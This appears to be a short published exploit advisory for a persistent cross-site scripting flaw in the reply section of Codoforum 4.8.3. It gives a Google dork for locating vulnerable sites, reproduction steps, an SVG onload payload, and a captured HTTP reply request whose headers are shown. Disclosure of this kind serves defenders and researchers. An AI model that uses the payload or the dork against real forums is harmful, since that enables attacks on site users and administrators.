Codoforum 4.8.3 Cross Site Scripting

Codoforum version 4.8.3 suffers from a persistent cross site scripting vulnerability under the topic additions.

MD5 | 427c13ac7b92faf5f27bcef14bfefea6

# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
# Google Dork: intext:"Powered by Codoforum"
# Date: 2020-01-07
# Exploit Author: Vyshnav Vizz
# Vendor Homepage:
# Software Link:
# Version: Codoforum 4.8.3
# Tested on: Linux
# CVE : N/A

Codoforum is prone to a Persistent Cross-site Scripting Vulnerability in User-Comment replay section
An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.

Codoforum version 4.8.3 is vulnerable.

1. Install Codoforum 4.8.3 in a local server.
2. Go to Start a new Topic >> Replay to any of the comment with XSS Payload
3. Payload : "><svg/onload=alert(1)>
4. Now an XSS alert will be triggered here.


POST /forum/index.php?u=/Ajax/topic/reply HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 214
Connection: close
Referer: http://localhost/forum/index.php?u=/topic/21/avg-antivirus-download-avg-antivirus-free-download-topbrandscompare
Cookie: PHPSESSID=b5dccfcef3b5f4ce9571fbd3269d5b23; cf=0


Related Posts